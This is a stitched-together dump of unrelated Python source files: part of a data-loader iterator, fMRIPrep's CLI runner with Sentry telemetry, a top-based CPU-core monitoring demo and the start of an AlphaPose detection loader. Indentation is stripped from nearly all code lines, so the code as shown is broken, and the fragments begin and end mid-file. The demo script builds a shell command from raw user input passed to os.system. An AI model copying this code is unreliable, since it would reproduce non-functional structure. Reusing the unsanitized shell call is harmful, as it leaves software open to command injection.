worker_idx = next(self._workers_idx_cycle)
self._indices_queues[worker_idx].put((self._send_idx, indices))
self._batches_outstanding += 1
self._send_idx += 1
def __del__(self):
self._try_shutdown_all()
def __next__(self):
try:
            # _batches_outstanding records the number of batches between
            # _try_put_indices and outputting the data; it should equal
            # _outstanding_capacity while the data is not drained. If
            # _batches_outstanding is less than the number of _places, there is
            # not enough data to generate the next output, so close the
            # blocking_queue and set _thread_done_event here; py_reader will
            # raise StopIteration, and the workers and indices_queues are ended
            # in the StopIteration handling
if self._batches_outstanding < len(self._places):
self._thread_done_event.set()
self._blocking_queue.close()
if in_dygraph_mode():
data = self._reader.read_next_var_list()
else:
if self._return_list:
data = self._reader.read_next_list()
                    # static graph mode organizes multi-device data as a list;
                    # if the place number is 1 there is only one device, so
                    # extract the data from the list to stay compatible with
                    # dygraph mode
if len(self._places) == 1:
data = data[0]
else:
data = self._reader.read_next()
self._on_output_batch()
return data
except StopIteration:
self._reader.reset()
self._try_shutdown_all()
six.reraise(*sys.exc_info())
# python2 compatibility
def next(self):
return self.__next__()
def _on_output_batch(self):
for _ in range(len(self._places)):
self._batches_outstanding -= 1
self._try_put_indices()
|
run.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
fMRI preprocessing workflow
=====
"""
import os
import os.path as op
from pathlib import Path
import logging
import sys
import gc
import re
import uuid
import json
import tempfile
import psutil
import warnings
import subprocess
from argparse import ArgumentParser
from argparse import RawTextHelpFormatter
from multiprocessing import cpu_count
from time import strftime
from glob import glob
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
logger = logging.getLogger('cli')
def _warn_redirect(message, category, filename, lineno, file=None, line=None):
logger.warning('Captured warning (%s): %s', category, message)
def check_deps(workflow):
from nipype.utils.filemanip import which
return sorted(
(node.interface.__class__.__name__, node.interface._cmd)
for node in workflow._get_all_nodes()
if (hasattr(node.interface, '_cmd') and
which(node.interface._cmd.split()[0]) is None))
def get_parser():
"""Build parser object"""
from ..__about__ import __version__
verstr = 'fmriprep v{}'.format(__version__)
parser = ArgumentParser(description='FMRIPREP: fMRI PREProcessing workflows',
formatter_class=RawTextHelpFormatter)
# Arguments as specified by BIDS-Apps
# required, positional arguments
# IMPORTANT: they must go directly with the parser object
parser.add_argument('bids_dir', action='store',
help='the root folder of a BIDS valid dataset (sub-XXXXX folders should '
'be found at the top level in this folder).')
parser.add_argument('output_dir', action='store',
help='the output path for the outcomes of preprocessing and visual '
'reports')
parser.add_argument('analysis_level', choices=['participant'],
help='processing stage to be run, only "participant" in the case of '
'FMRIPREP (see BIDS-Apps specification).')
# optional arguments
parser.add_argument('--version', action='version', version=verstr)
g_bids = parser.add_argument_group('Options for filtering BIDS queries')
g_bids.add_argument('--skip_bids_validation', '--skip-bids-validation', action='store_true',
default=False,
help='assume the input dataset is BIDS compliant and skip the validation')
g_bids.add_argument('--participant_label', '--participant-label', action='store', nargs='+',
help='a space delimited list of participant identifiers or a single '
'identifier (the sub- prefix can be removed)')
# Re-enable when option is actually implemented
# g_bids.add_argument('-s', '--session-id', action='store', default='single_session',
# help='select a specific session to be processed')
# Re-enable when option is actually implemented
# g_bids.add_argument('-r', '--run-id', action='store', default='single_run',
# help='select a specific run to be processed')
g_bids.add_argument('-t', '--task-id', action='store',
help='select a specific task to be processed')
g_bids.add_argument('--echo-idx', action='store', type=int,
help='select a specific echo to be processed in a multiecho series')
g_perfm = parser.add_argument_group('Options to handle performance')
g_perfm.add_argument('--nthreads', '--n_cpus', '-n-cpus', action='store', type=int,
help='maximum number of threads across all processes')
g_perfm.add_argument('--omp-nthreads', action='store', type=int, default=0,
help='maximum number of threads per-process')
g_perfm.add_argument('--mem_mb', '--mem-mb', action='store', default=0, type=int,
help='upper bound memory limit for FMRIPREP processes')
g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--anat-only', action='store_true',
help='run anatomical workflows only')
g_perfm.add_argument('--boilerplate', action='store_true',
help='generate boilerplate only')
g_perfm.add_argument('--ignore-aroma-denoising-errors', action='store_true',
default=False,
help='ignores the errors ICA_AROMA returns when there '
'are no components classified as either noise or '
'signal')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_perfm.add_argument('--debug', action='store_true', default=False,
help='DEPRECATED - Does not do what you want.')
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--ignore', required=False, action='store', nargs="+", default=[],
choices=['fieldmaps', 'slicetiming', 'sbref'],
help='ignore selected aspects of the input dataset to disable corresponding '
'parts of the workflow (a space delimited list)')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
g_conf.add_argument(
'--t2s-coreg', action='store_true',
help='If provided with multi-echo BOLD dataset, create T2*-map and perform '
'T2*-driven coregistration. When multi-echo data is provided and this '
'option is not enabled, standard EPI-T1 coregistration is performed '
'using the middle echo.')
g_conf.add_argument('--bold2t1w-dof', action='store', default=6, choices=[6, 9, 12], type=int,
help='Degrees of freedom when registering BOLD to T1w images. '
'6 degrees (rotation and translation) are used by default.')
g_conf.add_argument(
'--output-space', required=False, action='store',
choices=['T1w', 'template', 'fsnative', 'fsaverage', 'fsaverage6', 'fsaverage5'],
nargs='+', default=['template', 'fsaverage5'],
help='volume and surface spaces to resample functional series into\n'
' - T1w: subject anatomical volume\n'
' - template: normalization target specified by --template\n'
' - fsnative: individual subject surface\n'
' - fsaverage*: FreeSurfer average meshes\n'
'this argument can be single value or a space delimited list,\n'
'for example: --output-space T1w fsnative'
)
g_conf.add_argument(
'--force-bbr', action='store_true', dest='use_bbr', default=None,
help='Always use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--force-no-bbr', action='store_false', dest='use_bbr', default=None,
help='Do not use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--template', required=False, action='store',
choices=['MNI152NLin2009cAsym'], default='MNI152NLin2009cAsym',
help='volume template space (default: MNI152NLin2009cAsym)')
g_conf.add_argument(
'--output-grid-reference', required=False, action='store',
help='Deprecated after FMRIPREP 1.0.8. Please use --template-resampling-grid instead.')
g_conf.add_argument(
'--template-resampling-grid', required=False, action='store', default='native',
help='Keyword ("native", "1mm", or "2mm") or path to an existing file. '
'Allows to define a reference grid for the resampling of BOLD images in template '
'space. Keyword "native" will use the original BOLD grid as reference. '
'Keywords "1mm" and "2mm" will use the corresponding isotropic template '
'resolutions. If a path is given, the grid of that image will be used. '
'It determines the field of view and resolution of the output images, '
'but is not used in normalization.')
g_conf.add_argument(
'--medial-surface-nan', required=False, action='store_true', default=False,
help='Replace medial wall values with NaNs on functional GIFTI files. Only '
'performed for GIFTI files mapped to a freesurfer subject (fsaverage or fsnative).')
# ICA_AROMA options
g_aroma = parser.add_argument_group('Specific options for running ICA_AROMA')
g_aroma.add_argument('--use-aroma', action='store_true', default=False,
help='add ICA_AROMA to your preprocessing stream')
g_aroma.add_argument('--aroma-melodic-dimensionality', action='store',
default=-200, type=int,
help='Exact or maximum number of MELODIC components to estimate '
'(positive = exact, negative = maximum)')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument('--skull-strip-template', action='store', default='OASIS',
choices=['OASIS', 'NKI'],
                        help='select ANTs skull-stripping template (default: OASIS)')
g_ants.add_argument('--skull-strip-fixed-seed', action='store_true',
help='do not use a random seed for skull-stripping - will ensure '
'run-to-run replicability when used with --omp-nthreads 1')
# Fieldmap options
g_fmap = parser.add_argument_group('Specific options for handling fieldmaps')
g_fmap.add_argument('--fmap-bspline', action='store_true', default=False,
help='fit a B-Spline field using least-squares (experimental)')
g_fmap.add_argument('--fmap-no-demean', action='store_false', default=True,
help='do not remove median (within mask) from fieldmap')
# SyN-unwarp options
g_syn = parser.add_argument_group('Specific options for SyN distortion correction')
g_syn.add_argument('--use-syn-sdc', action='store_true', default=False,
help='EXPERIMENTAL: Use fieldmap-free distortion correction')
g_syn.add_argument('--force-syn', action='store_true', default=False,
help='EXPERIMENTAL/TEMPORARY: Use SyN correction in addition to '
'fieldmap correction, if available')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=os.path.abspath,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--cifti-output', action='store_true', default=False,
help='output BOLD files as CIFTI dtseries')
g_surfs_xor.add_argument('--fs-no-reconall', '--no-freesurfer',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.'
' Note : `--no-freesurfer` is deprecated and will be removed in 1.2.'
' Use `--fs-no-reconall` instead.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store',
help='path where intermediate results should be stored')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the FMRIPREP developers. This information helps to '
'improve FMRIPREP and provides an indicator of real '
'world usage crucial for obtaining funding.')
g_other.add_argument('--sloppy', action='store_true', default=False,
help='Use low-quality tools for speed - TESTING ONLY')
return parser
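# Example invocation this parser accepts (all paths below are placeholders):
#   fmriprep /data/bids /data/out participant \
#       --participant-label 01 02 --output-space T1w template \
#       --nthreads 8 --omp-nthreads 4 --fs-license-file /opt/freesurfer/license.txt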
def main():
"""Entry point"""
from nipype import logging as nlogging
from multiprocessing import set_start_method, Process, Manager
from ..viz.reports import generate_reports
from ..utils.bids import write_derivative_description
set_start_method('forkserver')
warnings.showwarning = _warn_redirect
opts = get_parser().parse_args()
exec_env = os.name
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
exec_env = 'singularity'
if 'docker' in Path('/proc/1/cgroup').read_text():
exec_env = 'docker'
if os.getenv('DOCKER_VERSION_8395080871'):
exec_env = 'fmriprep-docker'
sentry_sdk = None
if not opts.notrack:
import sentry_sdk
from ..__about__ import __version__
environment = "prod"
release = __version__
if not __version__:
environment = "dev"
release = "dev"
elif bool(int(os.getenv('FMRIPREP_DEV', 0))) or ('+' in __version__):
environment = "dev"
def before_send(event, hints):
# Filtering log messages about crashed nodes
if 'logentry' in event and 'message' in event['logentry']:
msg = event['logentry']['message']
if msg.startswith("could not run node:"):
return None
elif msg.startswith("Saving crash info to "):
return None
elif re.match("Node .+ failed to run on host .+", msg):
return None
if 'breadcrumbs' in event and isinstance(event['breadcrumbs'], list):
fingerprints_to_propagate = ['no-disk-space', 'memory-error', 'permission-denied',
'keyboard-interrupt']
for bc in event['breadcrumbs']:
msg = bc.get('message', 'empty-msg')
if msg in fingerprints_to_propagate:
event['fingerprint'] = [msg]
break
return event
sentry_sdk.init("https://d5a16b0c38d84d1584dfc93b9fb1ade6@sentry.io/1137693",
release=release,
environment=environment,
before_send=before_send)
with sentry_sdk.configure_scope() as scope:
scope.set_tag('exec_env', exec_env)
if exec_env == 'fmriprep-docker':
scope.set_tag('docker_version', os.getenv('DOCKER_VERSION_8395080871'))
free_mem_at_start = round(psutil.virtual_memory().free / 1024**3, 1)
scope.set_tag('free_mem_at_start', free_mem_at_start)
scope.set_tag('cpu_count', cpu_count())
# Memory policy may have a large effect on types of errors experienced
overcommit_memory = Path('/proc/sys/vm/overcommit_memory')
if overcommit_memory.exists():
policy = {'0': 'heuristic',
'1': 'always',
'2': 'never'}.get(overcommit_memory.read_text().strip(), 'unknown')
scope.set_tag('overcommit_memory', policy)
if policy == 'never':
                overcommit_kbytes = Path('/proc/sys/vm/overcommit_kbytes')
kb = overcommit_kbytes.read_text().strip()
if kb != '0':
limit = '{}kB'.format(kb)
else:
overcommit_ratio = Path('/proc/sys/vm/overcommit_ratio')
limit = '{}%'.format(overcommit_ratio.read_text().strip())
scope.set_tag('overcommit_limit', limit)
else:
scope.set_tag('overcommit_limit', 'n/a')
else:
scope.set_tag('overcommit_memory', 'n/a')
scope.set_tag('overcommit_limit', 'n/a')
for k, v in vars(opts).items():
scope.set_tag(k, v)
# Validate inputs
if not opts.skip_bids_validation:
print("Making sure the input data is BIDS compliant (warnings can be ignored in most "
"cases).")
validate_input_dir(exec_env, opts.bids_dir, opts.participant_label)
# FreeSurfer license
default_license = str(Path(os.getenv('FREESURFER_HOME')) / 'license.txt')
# Precedence: --fs-license-file, $FS_LICENSE, default_license
license_file = opts.fs_license_file or os.getenv('FS_LICENSE', default_license)
if not os.path.exists(license_file):
raise RuntimeError(
'ERROR: a valid license file is required for FreeSurfer to run. '
'FMRIPREP looked for an existing license file at several paths, in this '
'order: 1) command line argument ``--fs-license-file``; 2) ``$FS_LICENSE`` '
'environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. '
'Get it (for free) by registering at https://'
'surfer.nmr.mgh.harvard.edu/registration.html')
os.environ['FS_LICENSE'] = license_file
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
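    # verbose_count 0 -> 25 (IMPORTANT), -v -> 20 (INFO), -vv -> 15 (VERBOSE),
    # -vvv or more -> 10 (DEBUG), since the value is floored at logging.DEBUG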
# Set logging
logger.setLevel(log_level)
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
errno = 0
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
if p.exitcode != 0:
sys.exit(p.exitcode)
fmriprep_wf = retval['workflow']
plugin_settings = retval['plugin_settings']
bids_dir = retval['bids_dir']
output_dir = retval['output_dir']
work_dir = retval['work_dir']
subject_list = retval['subject_list']
run_uuid = retval['run_uuid']
if not opts.notrack:
with sentry_sdk.configure_scope() as scope:
scope.set_tag('run_uuid', run_uuid)
scope.set_tag('npart', len(subject_list))
retcode = retval['return_code']
if fmriprep_wf is None:
sys.exit(1)
if opts.write_graph:
fmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
if opts.reports_only:
sys.exit(int(retcode > 0))
if opts.boilerplate:
sys.exit(int(retcode > 0))
# Sentry tracking
if not opts.notrack:
sentry_sdk.add_breadcrumb(message='fMRIPrep started', level='info')
sentry_sdk.capture_message('fMRIPrep started', level='info')
# Check workflow for missing commands
missing = check_deps(fmriprep_wf)
if missing:
print("Cannot run fMRIPrep. Missing dependencies:")
for iface, cmd in missing:
print("\t{} (Interface: {})".format(cmd, iface))
sys.exit(2)
# Clean up master process before running workflow, which may create forks
gc.collect()
try:
fmriprep_wf.run(**plugin_settings)
except RuntimeError as e:
errno = 1
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
raise
finally:
# Generate reports phase
errno += generate_reports(subject_list, output_dir, work_dir, run_uuid,
sentry_sdk=sentry_sdk)
write_derivative_description(bids_dir, str(Path(output_dir) / 'fmriprep'))
if not opts.notrack and errno == 0:
sentry_sdk.capture_message('fMRIPrep finished without errors', level='info')
sys.exit(int(errno > 0))
def validate_input_dir(exec_env, bids_dir, participant_label):
# Ignore issues and warnings that should not influence FMRIPREP
validator_config_dict = {
"ignore": [
"EVENTS_COLUMN_ONSET",
"EVENTS_COLUMN_DURATION",
"TSV_EQUAL_ROWS",
"TSV_EMPTY_CELL",
"TSV_IMPROPER_NA",
"VOLUME_COUNT_MISMATCH",
"BVAL_MULTIPLE_ROWS",
"BVEC_NUMBER_ROWS",
"DWI_MISSING_BVAL",
"INCONSISTENT_SUBJECTS",
"INCONSISTENT_PARAMETERS",
"BVEC_ROW_LENGTH",
"B_FILE",
"PARTICIPANT_ID_COLUMN",
"PARTICIPANT_ID_MISMATCH",
"TASK_NAME_MUST_DEFINE",
"PHENOTYPE_SUBJECTS_MISSING",
"STIMULUS_FILE_MISSING",
"DWI_MISSING_BVEC",
"EVENTS_TSV_MISSING",
"TSV_IMPROPER_NA",
"ACQTIME_FMT",
"Participants age 89 or higher",
"DATASET_DESCRIPTION_JSON_MISSING",
"FILENAME_COLUMN",
"WRONG_NEW_LINE",
"MISSING_TSV_COLUMN_CHANNELS",
"MISSING_TSV_COLUMN_IEEG_CHANNELS",
"MISSING_TSV_COLUMN_IEEG_ELECTRODES",
"UNUSED_STIMULUS",
"CHANNELS_COLUMN_SFREQ",
"CHANNELS_COLUMN_LOWCUT",
"CHANNELS_COLUMN_HIGHCUT",
"CHANNELS_COLUMN_NOTCH",
"CUSTOM_COLUMN_WITHOUT_DESCRIPTION",
"ACQTIME_FMT",
"SUSPICIOUSLY_LONG_EVENT_DESIGN",
"SUSPICIOUSLY_SHORT_EVENT_DESIGN",
"MALFORMED_BVEC",
"MALFORMED_BVAL",
"MISSING_TSV_COLUMN_EEG_ELECTRODES",
"MISSING_SESSION"
],
"error": ["NO_T1W"],
"ignoredFiles": ['/dataset_description.json', '/participants.tsv']
}
# Limit validation only to data from requested participants
if participant_label:
all_subs = set([os.path.basename(i)[4:] for i in glob(os.path.join(bids_dir,
"sub-*"))])
selected_subs = []
for selected_sub in participant_label:
if selected_sub.startswith("sub-"):
selected_subs.append(selected_sub[4:])
else:
selected_subs.append(selected_sub)
selected_subs = set(selected_subs)
bad_labels = selected_subs.difference(all_subs)
if bad_labels:
error_msg = 'Data for requested participant(s) label(s) not found. Could ' \
'not find data for participant(s): %s. Please verify the requested ' \
'participant labels.'
if exec_env == 'docker':
error_msg += ' This error can be caused by the input data not being ' \
'accessible inside the docker container. Please make sure all ' \
'volumes are mounted properly (see https://docs.docker.com/' \
'engine/reference/commandline/run/#mount-volume--v---read-only)'
if exec_env == 'singularity':
error_msg += ' This error can be caused by the input data not being ' \
'accessible inside the singularity container. Please make sure ' \
'all paths are mapped properly (see https://www.sylabs.io/' \
'guides/3.0/user-guide/bind_paths_and_mounts.html)'
raise RuntimeError(error_msg % ','.join(bad_labels))
ignored_subs = all_subs.difference(selected_subs)
if ignored_subs:
for sub in ignored_subs:
validator_config_dict["ignoredFiles"].append("/sub-%s/**" % sub)
with tempfile.NamedTemporaryFile('w+') as temp:
temp.write(json.dumps(validator_config_dict))
temp.flush()
try:
subprocess.check_call(['bids-validator', bids_dir, '-c', temp.name])
except FileNotFoundError:
logger.error("bids-validator does not appear to be installed")
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution
graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows fmriprep to enforce
a hard-limited memory-scope.
"""
from subprocess import check_call, CalledProcessError, TimeoutExpired
from pkg_resources import resource_filename as pkgrf
from nipype import logging, config as ncfg
from ..__about__ import __version__
from ..workflows.base import init_fmriprep_wf
from ..utils.bids import collect_participants
from ..viz.reports import generate_reports
logger = logging.getLogger('nipype.workflow')
INIT_MSG = """
Running fMRIPREP version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
""".format
output_spaces = opts.output_space or []
# Validity of some inputs
# ERROR check if use_aroma was specified, but the correct template was not
if opts.use_aroma and (opts.template != 'MNI152NLin2009cAsym' or
'template' not in output_spaces):
output_spaces.append('template')
logger.warning(
'Option "--use-aroma" requires functional images to be resampled to MNI space. '
'The argument "template" has been automatically added to the list of output '
'spaces (option "--output-space").'
)
# Check output_space
if 'template' not in output_spaces and (opts.use_syn_sdc or opts.force_syn):
msg = ['SyN SDC correction requires T1 to MNI registration, but '
'"template" is not specified in "--output-space" arguments.',
'Option --use-syn will be cowardly dismissed.']
if opts.force_syn:
output_spaces.append('template')
msg[1] = (' Since --force-syn has been requested, "template" has been added to'
' the "--output-space" list.')
logger.warning(' '.join(msg))
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
# First check that bids_dir looks like a BIDS folder
bids_dir = os.path.abspath(opts.bids_dir)
subject_list = collect_participants(
bids_dir, participant_label=opts.participant_label)
# Load base plugin_settings from file if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
plugin_settings.setdefault('plugin_args', {})
else:
# Defaults
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
# Resource management options
# Note that we're making strong assumptions about valid plugin args
# This may need to be revisited if people try to use batch plugins
nthreads = plugin_settings['plugin_args'].get('n_procs')
# Permit overriding plugin config with specific CLI options
if nthreads is None or opts.nthreads is not None:
nthreads = opts.nthreads
if nthreads is None or nthreads < 1:
nthreads = cpu_count()
plugin_settings['plugin_args']['n_procs'] = nthreads
if opts.mem_mb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_mb / 1024
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nthreads - 1 if nthreads > 1 else cpu_count(), 8)
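        # e.g. with --nthreads 8 and --omp-nthreads 0 this picks
        # min(8 - 1, 8) = 7 threads per process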
if 1 < nthreads < omp_nthreads:
logger.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'threads (--nthreads/--n_cpus=%d)', omp_nthreads, nthreads)
# Set up directories
output_dir = op.abspath(opts.output_dir)
log_dir = op.join(output_dir, 'fmriprep', 'logs')
work_dir = op.abspath(opts.work_dir or 'work') # Set work/ as default
# Check and create output and working directories
os.makedirs(output_dir, exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
os.makedirs(work_dir, exist_ok=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': log_dir,
'log_to_file': True
},
'execution': {
'crashdump_dir': log_dir,
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash or opts.work_dir is None,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
retval['return_code'] = 0
retval['plugin_settings'] = plugin_settings
retval['bids_dir'] = bids_dir
retval['output_dir'] = output_dir
retval['work_dir'] = work_dir
retval['subject_list'] = subject_list
retval['run_uuid'] = run_uuid
retval['workflow'] = None
# Called with reports only
if opts.reports_only:
logger.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['return_code'] = generate_reports(subject_list, output_dir, work_dir, run_uuid)
return retval
# Build main workflow
logger.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid)
)
template_out_grid = opts.template_resampling_grid
if opts.output_grid_reference is not None:
logger.warning(
'Option --output-grid-reference is deprecated, please use '
'--template-resampling-grid')
template_out_grid = template_out_grid or opts.output_grid_reference
if opts.debug:
logger.warning('Option --debug is deprecated and has no effect')
retval['workflow'] = init_fmriprep_wf(
subject_list=subject_list,
task_id=opts.task_id,
echo_idx=opts.echo_idx,
run_uuid=run_uuid,
ignore=opts.ignore,
debug=opts.sloppy,
low_mem=opts.low_mem,
anat_only=opts.anat_only,
longitudinal=opts.longitudinal,
t2s_coreg=opts.t2s_coreg,
omp_nthreads=omp_nthreads,
skull_strip_template=opts.skull_strip_template,
skull_strip_fixed_seed=opts.skull_strip_fixed_seed,
work_dir=work_dir,
output_dir=output_dir,
bids_dir=bids_dir,
freesurfer=opts.run_reconall,
output_spaces=output_spaces,
template=opts.template,
medial_surface_nan=opts.medial_surface_nan,
cifti_output=opts.cifti_output,
template_out_grid=template_out_grid,
hires=opts.hires,
use_bbr=opts.use_bbr,
bold2t1w_dof=opts.bold2t1w_dof,
fmap_bspline=opts.fmap_bspline,
fmap_demean=opts.fmap_no_demean,
use_syn=opts.use_syn_sdc,
force_syn=opts.force_syn,
use_aroma=opts.use_aroma,
aroma_melodic_dim=opts.aroma_melodic_dimensionality,
ignore_aroma_err=opts.ignore_aroma_denoising_errors,
)
retval['return_code'] = 0
logs_path = Path(output_dir) / 'fmriprep' / 'logs'
boilerplate = retval['workflow'].visit_desc()
(logs_path / 'CITATION.md').write_text(boilerplate)
logger.log(25, 'Works derived from this fMRIPrep execution should '
'include the following boilerplate:\n\n%s', boilerplate)
# Generate HTML file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('fmriprep', 'data/boilerplate.bib'),
'--filter', 'pandoc-citeproc',
str(logs_path / 'CITATION.md'),
'-o', str(logs_path / 'CITATION.html')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.html file:\n%s',
' '.join(cmd))
# Generate LaTex file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('fmriprep', 'data/boilerplate.bib'),
'--natbib', str(logs_path / 'CITATION.md'),
'-o', str(logs_path / 'CITATION.tex')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.tex file:\n%s',
' '.join(cmd))
return retval
if __name__ == '__main__':
raise RuntimeError("fmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` fmriprep and use the `fmriprep` command")
|
demo1.py
|
from os import system
import threading
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime as dt
import time
global info
info = {}
def extract_data(pid,refreshRate):
system("top -H -p "+pid+" -d "+refreshRate+" -b | grep "+pid+" >> "+pid+refreshRate+".txt")
def process_data(pid,refreshRate):
global info
while (1):
f = open(pid+refreshRate+".txt")
data = f.readlines()
data = [i.strip() for i in data[:len(data)-1]]
time = [i.split()[-2] for i in data]
cores = [int(i.split()[-1]) for i in data]
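        # Parsing assumption: each `top -H -b` line is expected to end with the
        # TIME+ field followed by the last-used-CPU (P) column, so [-2] is the
        # thread time and [-1] the core id; this relies on top being configured
        # (e.g. via a toprc) to show the P column last.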
df = {"cores":pd.Series(np.array(cores)),"time":pd.Series(np.array(time))}
df = pd.DataFrame(df)
freq_change = {}
start = df['time'][0]
for i in range(1,len(df)):
if df['cores'][i-1]!=df['cores'][i]:
freq_change[(start,df['time'][i])] = df['cores'][i-1]
start = df['time'][i]
start_time = [dt.strptime(i[0],"%M:%S.%f") for i in list(freq_change.keys())]
end_time = [dt.strptime(i[1],"%M:%S.%f") for i in list(freq_change.keys())]
deltas = [(end_time[i]-start_time[i]).microseconds for i in range(len(start_time))]
core_time = {"core":pd.Series(np.array(list(freq_change.values()))),"time":pd.Series(np.array(deltas))}
core_time = pd.DataFrame(core_time)
core_time.tail()
def to_milli(example):
return example/1000
core_time['time'] = core_time['time'].apply(to_milli)
print(core_time)
for i in range(4):
if i in info:
for j in range(len(core_time)):
if i==core_time['core'][j]:
info[i] += core_time['time'][j]
else:
info[i] = 0
for j in range(len(core_time)):
for i in range(4):
if i==core_time['core'][j]:
info[i] += core_time['time'][j]
print(info)
display_data(pid,refreshRate)
def display_data(pid,refreshRate):
global info
x = np.arange(len(info.keys()))
plt.bar(x, np.array(list(info.values())), color = 'blue')
plt.xlabel("Core IDs",fontsize=10)
plt.ylabel("Count in milliseconds",fontsize=10)
plt.draw()
plt.pause(0.1)
if __name__ == '__main__':
pid = input("Enter Process ID: ")
refreshRate = input("Enter Refresh Rate: ")
extract_thread = threading.Thread(target=extract_data, args = (pid,refreshRate))
display_thread = threading.Thread(target=process_data, args = (pid,refreshRate))
extract_thread.start()
time.sleep(4)
display_thread.start()
extract_thread.join()
display_thread.join()
print("DONE")
|
detector.py
|
import os
import sys
from threading import Thread
from queue import Queue
import cv2
import scipy.misc
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.presets import SimpleTransform
class DetectionLoader():
def __init__(self, input_source, detector, cfg, opt, mode='image', batchSize=1, queueSize=128):
self.cfg = cfg
self.opt = opt
self.mode = mode
self.device = opt.device
if mode == 'image':
self.img_dir = opt.inputpath
self.imglist = [os.path.join(self.img_dir, im_name.rstrip('\n').rstrip('\r')) for im_name in input_source]
self.datalen = len(input_source)
elif mode == 'video':
stream = cv2.VideoCapture(input_source)
assert stream.isOpened(), 'Cannot capture source'
self.path = input_source
self.datalen = int(stream.get(cv2.CAP_PROP_FRAME_COUNT))
self.fourcc = int(stream.get(cv2.CAP_PROP_FOURCC))
self.fps = stream.get(cv2.CAP_PROP_FPS)
self.frameSize = (int(stream.get(cv2.CAP_PROP_FRAME_WIDTH)), int(stream.get(cv2.CAP_PROP_FRAME_HEIGHT)))
self.videoinfo = {'fourcc': self.fourcc, 'fps': self.fps, 'frameSize': self.frameSize}
stream.release()
self.detector = detector
self.batchSize = batchSize
leftover = 0
if (self.datalen) % batchSize:
leftover = 1
self.num_batches = self.datalen // batchSize + leftover
self._input_size = cfg.DATA_PRESET.IMAGE_SIZE
self._output_size = cfg.DATA_PRESET.HEATMAP_SIZE
